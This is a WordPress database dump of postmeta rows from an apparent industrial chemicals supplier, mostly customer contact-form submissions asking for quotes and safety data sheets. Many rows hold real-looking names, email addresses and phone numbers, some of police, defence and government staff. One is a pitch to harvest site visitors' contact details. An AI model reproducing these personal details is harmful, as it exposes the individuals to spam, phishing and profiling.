INSERT INTO `wp_postmeta` VALUES (26137, 3009, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26138, 3009, '_field_1', 'Seyfullah Yilmaz'); 
INSERT INTO `wp_postmeta` VALUES (26139, 3009, '_field_10', 'Nehir Biyoteknoloji Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (26140, 3009, '_field_2', 'syilmaz@nehirbt.com.tr'); 
INSERT INTO `wp_postmeta` VALUES (26141, 3009, '_field_8', '(534) 989-7162'); 
INSERT INTO `wp_postmeta` VALUES (26142, 3009, '_field_3', 'Dear Madame/Sir,\r\nwe are interested in purchasing Krytox 157 FSH for our research. Could you send us a quotation for 100, 250 and 500ml of this oil?\r\n\r\nWith best regards\r\nDr. Seyfullah Yilmaz'); 
INSERT INTO `wp_postmeta` VALUES (26143, 3009, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26144, 3009, '_sub_id', '3009'); 
INSERT INTO `wp_postmeta` VALUES (26145, 1717, '_wp_attachment_image_alt', 'Aero Duster MS-222N'); 
INSERT INTO `wp_postmeta` VALUES (26146, 489, '_wp_old_slug', 'aeroduster-ms-222n'); 
INSERT INTO `wp_postmeta` VALUES (26147, 489, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26148, 489, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26149, 489, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26150, 489, '_yoast_wpseo_focuskw_text_input', 'Aero Duster MS-222N'); 
INSERT INTO `wp_postmeta` VALUES (26151, 489, '_yoast_wpseo_focuskw', 'Aero Duster MS-222N'); 
INSERT INTO `wp_postmeta` VALUES (26152, 489, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26153, 489, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26154, 3009, '_edit_lock', '1479037908:1'); 
INSERT INTO `wp_postmeta` VALUES (26155, 425, '_wp_old_slug', 'semi-permanent-mold-release-agents-2'); 
INSERT INTO `wp_postmeta` VALUES (26157, 3012, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26158, 3012, '_seq_num', '109'); 
INSERT INTO `wp_postmeta` VALUES (26159, 3012, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26160, 3012, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26161, 3012, '_field_1', 'Falko Berner'); 
INSERT INTO `wp_postmeta` VALUES (26162, 3012, '_field_10', 'Polizeifliegerstaffel NRW Germany'); 
INSERT INTO `wp_postmeta` VALUES (26163, 3012, '_field_2', 'falko.berner@polizei.nrw.de'); 
INSERT INTO `wp_postmeta` VALUES (26164, 3012, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26165, 3012, '_field_3', 'Hello,\r\nis the Air Duster Spray MS-22N 12 OZ the same as the MS-222N?\r\nThanks in advance.\r\nkind regards.'); 
INSERT INTO `wp_postmeta` VALUES (26166, 3012, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26167, 3012, '_sub_id', '3012'); 
INSERT INTO `wp_postmeta` VALUES (26168, 3013, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26169, 3013, '_seq_num', '110'); 
INSERT INTO `wp_postmeta` VALUES (26170, 3013, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26171, 3013, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26172, 3013, '_field_1', 'Keizle'); 
INSERT INTO `wp_postmeta` VALUES (26173, 3013, '_field_10', 'B-SAFE FZE'); 
INSERT INTO `wp_postmeta` VALUES (26174, 3013, '_field_2', 'bsafe@eim.ae'); 
INSERT INTO `wp_postmeta` VALUES (26175, 3013, '_field_8', '(971) 439-6652'); 
INSERT INTO `wp_postmeta` VALUES (26176, 3013, '_field_3', 'Good day Sir/Madam,\r\n\r\n\r\nPlease do send us your best offer with Freight Charges for the below item:\r\n\r\nEpirez Supatuff Acid Resistant Coating (AR)  - 20LTR\r\n\r\nAddress:\r\nB-11, Lahej, Sultan,Building,Karama, Dubai,UAE\r\n\r\nYour prompt response would be a great help\r\n\r\n\r\nRegards,\r\nKeizle\r\nAccounts Department\r\nB-Safe FZE\r\nDirect Line: +971 4-3966525\r\nT: +971 4-3966455 \r\n'); 
INSERT INTO `wp_postmeta` VALUES (26177, 3013, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26178, 3013, '_sub_id', '3013'); 
INSERT INTO `wp_postmeta` VALUES (26179, 3014, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26180, 3014, '_seq_num', '123'); 
INSERT INTO `wp_postmeta` VALUES (26181, 3014, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26182, 3014, '_field_12', 'Jeff Creak'); 
INSERT INTO `wp_postmeta` VALUES (26183, 3014, '_field_13', 'TE Connectivity'); 
INSERT INTO `wp_postmeta` VALUES (26184, 3014, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26185, 3014, '_field_14', 'jeff.creak@te.com'); 
INSERT INTO `wp_postmeta` VALUES (26186, 3014, '_field_15', '(757) 766-4342'); 
INSERT INTO `wp_postmeta` VALUES (26187, 3014, '_field_16', 'Please give a detailed description of the difference between MS-472C and the obsoleted MS-472N.  It would additionally be helpful if you could provide a datasheet of both items.'); 
INSERT INTO `wp_postmeta` VALUES (26188, 3014, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26189, 3014, '_sub_id', '3014'); 
INSERT INTO `wp_postmeta` VALUES (26190, 3015, '_edit_lock', '1496148957:3'); 
INSERT INTO `wp_postmeta` VALUES (26191, 3015, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (26192, 3015, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (26193, 3015, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26194, 3015, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26195, 3015, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26196, 3015, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26197, 3015, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (26198, 3018, '_wp_attached_file', '2016/11/shutterstock_401774137.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26199, 3018, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/11/shutterstock_401774137.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_401774137-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_401774137-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_401774137-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_401774137-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_401774137-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_401774137-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_401774137-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26200, 3019, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26201, 3019, '_seq_num', '111'); 
INSERT INTO `wp_postmeta` VALUES (26202, 3019, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26203, 3019, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26204, 3019, '_field_1', 'Gloria Wurm'); 
INSERT INTO `wp_postmeta` VALUES (26205, 3019, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (26206, 3019, '_field_2', 'gloriah.wurm@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26207, 3019, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (26208, 3019, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nGloria Wurm\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nhttps://www.smartertactics.com'); 
INSERT INTO `wp_postmeta` VALUES (26209, 3019, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26210, 3019, '_sub_id', '3019'); 
INSERT INTO `wp_postmeta` VALUES (26211, 3018, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (26212, 3015, '_thumbnail_id', '3018'); 
INSERT INTO `wp_postmeta` VALUES (26214, 3015, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (26215, 3015, '_yoast_wpseo_focuskw_text_input', 'PTFE Dry Film Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (26216, 3015, '_yoast_wpseo_focuskw', 'PTFE Dry Film Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (26217, 3015, '_yoast_wpseo_title', 'PTFE Dry Film Mold Release Agents | No Post-Molding Cleaning |'); 
INSERT INTO `wp_postmeta` VALUES (26218, 3015, '_yoast_wpseo_metadesc', 'PTFE Dry Film Mold Release Agents offer no transfer or post-molding cleaning. Ideal for rubber to metal bonding, silicone molding, resin potting FRP molding'); 
INSERT INTO `wp_postmeta` VALUES (26220, 3015, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (26221, 3022, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26222, 3022, '_seq_num', '124'); 
INSERT INTO `wp_postmeta` VALUES (26223, 3022, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26224, 3022, '_field_12', 'Peter M. Hamilton'); 
INSERT INTO `wp_postmeta` VALUES (26225, 3022, '_field_13', 'Eaton'); 
INSERT INTO `wp_postmeta` VALUES (26226, 3022, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26227, 3022, '_field_14', 'PeterMHamilton@Eaton.com'); 
INSERT INTO `wp_postmeta` VALUES (26228, 3022, '_field_15', '(610) 522-4971'); 
INSERT INTO `wp_postmeta` VALUES (26229, 3022, '_field_16', 'I am requesting an SDS for your MS-143XD (PTFE) release coating.\nI will be sending the information into our EHS dept for approval to bring your product in house for testing on our parts.'); 
INSERT INTO `wp_postmeta` VALUES (26230, 3022, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26231, 3022, '_sub_id', '3022'); 
INSERT INTO `wp_postmeta` VALUES (26232, 3023, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26233, 3023, '_seq_num', '112'); 
INSERT INTO `wp_postmeta` VALUES (26234, 3023, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26235, 3023, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26236, 3023, '_field_1', 'jeff  lewis'); 
INSERT INTO `wp_postmeta` VALUES (26237, 3023, '_field_10', 'best finish'); 
INSERT INTO `wp_postmeta` VALUES (26238, 3023, '_field_2', 'jeff123snow@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26239, 3023, '_field_8', '5195259700'); 
INSERT INTO `wp_postmeta` VALUES (26240, 3023, '_field_3', 'Call me 519 525 9700 I want some info and prices on your epoxy. Jeff123snow@hotmail.com '); 
INSERT INTO `wp_postmeta` VALUES (26241, 3023, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26242, 3023, '_sub_id', '3023'); 
INSERT INTO `wp_postmeta` VALUES (26243, 3024, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26244, 3024, '_seq_num', '113'); 
INSERT INTO `wp_postmeta` VALUES (26245, 3024, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26246, 3024, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26247, 3024, '_field_1', 'Ken Vojacek'); 
INSERT INTO `wp_postmeta` VALUES (26248, 3024, '_field_10', 'Solid Design Solutions'); 
INSERT INTO `wp_postmeta` VALUES (26249, 3024, '_field_2', 'kenv@soliddesignsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (26250, 3024, '_field_8', '(763) 782-3486'); 
INSERT INTO `wp_postmeta` VALUES (26251, 3024, '_field_3', 'Heat staking , using brass, a PET injected molded product that needs to be FDA compliant. Part assembly cannot be washed because it involves a sterile cloth fabric. Want to treat the heat stake ends to cut down on clean time between processes.'); 
INSERT INTO `wp_postmeta` VALUES (26252, 3024, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26253, 3024, '_sub_id', '3024'); 
INSERT INTO `wp_postmeta` VALUES (26254, 3025, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26255, 3025, '_seq_num', '114'); 
INSERT INTO `wp_postmeta` VALUES (26256, 3025, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26257, 3025, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26258, 3025, '_field_1', 'Donna Schoeckert'); 
INSERT INTO `wp_postmeta` VALUES (26259, 3025, '_field_10', 'Ellsworth Adhesives'); 
INSERT INTO `wp_postmeta` VALUES (26260, 3025, '_field_2', 'sds@ellsworth.com'); 
INSERT INTO `wp_postmeta` VALUES (26261, 3025, '_field_8', '(262) 509-8796'); 
INSERT INTO `wp_postmeta` VALUES (26262, 3025, '_field_3', 'Can you please send TDS for MS-143E'); 
INSERT INTO `wp_postmeta` VALUES (26263, 3025, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26264, 3025, '_sub_id', '3025'); 
INSERT INTO `wp_postmeta` VALUES (26265, 3026, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26266, 3026, '_seq_num', '125'); 
INSERT INTO `wp_postmeta` VALUES (26267, 3026, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26268, 3026, '_field_12', 'Steven Wood'); 
INSERT INTO `wp_postmeta` VALUES (26269, 3026, '_field_13', 'Wetaskiwin Air Services'); 
INSERT INTO `wp_postmeta` VALUES (26270, 3026, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26271, 3026, '_field_14', 'stevenw@absoluteaviation.ca'); 
INSERT INTO `wp_postmeta` VALUES (26272, 3026, '_field_15', '(780) 352-5643'); 
INSERT INTO `wp_postmeta` VALUES (26273, 3026, '_field_16', 'I am looking for the Canadian MSDS for MS-122AD. \r\nThanks,\r\nSteven Wood'); 
INSERT INTO `wp_postmeta` VALUES (26274, 3026, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26275, 3026, '_sub_id', '3026'); 
INSERT INTO `wp_postmeta` VALUES (26278, 3028, '_wp_attached_file', '2016/11/shutterstock_360561536.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26279, 3028, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2016/11/shutterstock_360561536.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_360561536-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_360561536-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_360561536-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_360561536-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_360561536-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_360561536-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_360561536-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26280, 3028, '_wp_attachment_image_alt', 'PTFE DryFilm Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (26287, 3034, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26288, 3034, '_seq_num', '115'); 
INSERT INTO `wp_postmeta` VALUES (26289, 3034, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26290, 3034, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26291, 3034, '_field_1', 'Bethel'); 
INSERT INTO `wp_postmeta` VALUES (26292, 3034, '_field_10', 'i3'); 
INSERT INTO `wp_postmeta` VALUES (26293, 3034, '_field_2', 'beth.willey@i3-corps.com'); 
INSERT INTO `wp_postmeta` VALUES (26294, 3034, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26295, 3034, '_field_3', 'Please email SDS for MS-122B Teflon spray. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (26296, 3034, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26297, 3034, '_sub_id', '3034'); 
INSERT INTO `wp_postmeta` VALUES (26300, 3036, '_edit_lock', '1479238926:2'); 
INSERT INTO `wp_postmeta` VALUES (26301, 3036, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (26302, 3037, '_wp_attached_file', '2016/11/shutterstock_230790487.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26303, 3037, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/11/shutterstock_230790487.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230790487-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_230790487-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_230790487-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230790487-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230790487-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_230790487-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_230790487-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26304, 3036, '_thumbnail_id', '3037'); 
INSERT INTO `wp_postmeta` VALUES (26306, 3036, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (26307, 3036, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (26308, 3036, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26309, 3036, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26310, 3036, '_yoast_wpseo_focuskw_text_input', 'Automotive Seat Lubrication'); 
INSERT INTO `wp_postmeta` VALUES (26311, 3036, '_yoast_wpseo_focuskw', 'Automotive Seat Lubrication'); 
INSERT INTO `wp_postmeta` VALUES (26312, 3036, '_yoast_wpseo_title', 'Krytox GPL 101 Automotive Seat Lubrication - Reduce Squeak'); 
INSERT INTO `wp_postmeta` VALUES (26313, 3036, '_yoast_wpseo_metadesc', 'A brazilian automotive manufacturer uses Krytox GPL 101 as an automotive seat lubrication to reduce squeak in their automotive car seats.'); 
INSERT INTO `wp_postmeta` VALUES (26314, 3036, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (26315, 3036, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26316, 3036, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (26318, 3036, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (26321, 3034, '_edit_lock', '1479290806:1'); 
INSERT INTO `wp_postmeta` VALUES (26322, 3042, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26323, 3042, '_seq_num', '126'); 
INSERT INTO `wp_postmeta` VALUES (26324, 3042, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26325, 3042, '_field_12', 'Debby Tucker'); 
INSERT INTO `wp_postmeta` VALUES (26326, 3042, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (26327, 3042, '_field_18', '169'); 
INSERT INTO `wp_postmeta` VALUES (26328, 3042, '_field_14', 'dtucker@peoriagov.org'); 
INSERT INTO `wp_postmeta` VALUES (26329, 3042, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26330, 3042, '_field_16', 'Please forward a copy of the most current SDS Sheet for En-Rust MS-350\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (26331, 3042, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26332, 3042, '_sub_id', '3042'); 
INSERT INTO `wp_postmeta` VALUES (26333, 3043, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26334, 3043, '_seq_num', '127'); 
INSERT INTO `wp_postmeta` VALUES (26335, 3043, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26336, 3043, '_field_12', 'John Meade'); 
INSERT INTO `wp_postmeta` VALUES (26337, 3043, '_field_13', 'National Security Technology'); 
INSERT INTO `wp_postmeta` VALUES (26338, 3043, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26339, 3043, '_field_14', 'Meadeja@nv.doe.gov'); 
INSERT INTO `wp_postmeta` VALUES (26340, 3043, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26341, 3043, '_field_16', 'Looking for an SDS on MS-170/CO2  or 1,1,1 Trichloroethane'); 
INSERT INTO `wp_postmeta` VALUES (26342, 3043, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26343, 3043, '_sub_id', '3043'); 
INSERT INTO `wp_postmeta` VALUES (26351, 3049, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26352, 3049, '_seq_num', '128'); 
INSERT INTO `wp_postmeta` VALUES (26353, 3049, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26354, 3049, '_field_12', 'Ferrière'); 
INSERT INTO `wp_postmeta` VALUES (26355, 3049, '_field_13', 'SODERN'); 
INSERT INTO `wp_postmeta` VALUES (26356, 3049, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26357, 3049, '_field_14', 'laura.ferriere@sodern.fr'); 
INSERT INTO `wp_postmeta` VALUES (26358, 3049, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26359, 3049, '_field_16', 'Hello,\r\nAt SODERN, we use one of your products : MS 240.\r\nI&#039;d be very grateful if you could send me the latest MSDS (material safety data sheet) in french (european version).\r\nThank you.\r\n\r\nBest regards,\r\n\r\nLaura Ferrière\r\nHealth &amp; Safety Engineer\r\nSODERN'); 
INSERT INTO `wp_postmeta` VALUES (26360, 3049, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26361, 3049, '_sub_id', '3049'); 
INSERT INTO `wp_postmeta` VALUES (26362, 3050, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26363, 3050, '_seq_num', '116'); 
INSERT INTO `wp_postmeta` VALUES (26364, 3050, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26365, 3050, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26366, 3050, '_field_1', 'Prem Naiker'); 
INSERT INTO `wp_postmeta` VALUES (26367, 3050, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (26368, 3050, '_field_2', 'psnaiker@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26369, 3050, '_field_8', '(604) 719-4419'); 
INSERT INTO `wp_postmeta` VALUES (26370, 3050, '_field_3', 'Seeking information in becoming a independent distributor for your products in vancouver b.c.  Thanks for your anticipation. '); 
INSERT INTO `wp_postmeta` VALUES (26371, 3050, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26372, 3050, '_sub_id', '3050'); 
INSERT INTO `wp_postmeta` VALUES (26373, 419, '_wp_old_slug', 'rubber-molding-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26374, 3053, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26375, 3053, '_seq_num', '129'); 
INSERT INTO `wp_postmeta` VALUES (26376, 3053, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26377, 3053, '_field_12', 'Patrick Smith'); 
INSERT INTO `wp_postmeta` VALUES (26378, 3053, '_field_13', 'ADF'); 
INSERT INTO `wp_postmeta` VALUES (26379, 3053, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26380, 3053, '_field_14', 'patrick.smith3@defence.gov.au'); 
INSERT INTO `wp_postmeta` VALUES (26381, 3053, '_field_15', '(088) 925-1514'); 
INSERT INTO `wp_postmeta` VALUES (26382, 3053, '_field_16', 'Hi,\r\nCould you please send me a SDS for &quot;PTFE release agent dry lubricant MS-122DF&quot; for my workshop aerosol cabinet '); 
INSERT INTO `wp_postmeta` VALUES (26383, 3053, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26384, 3053, '_sub_id', '3053'); 
INSERT INTO `wp_postmeta` VALUES (26385, 3054, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26386, 3054, '_seq_num', '117'); 
INSERT INTO `wp_postmeta` VALUES (26387, 3054, '_action', 'submit'); 
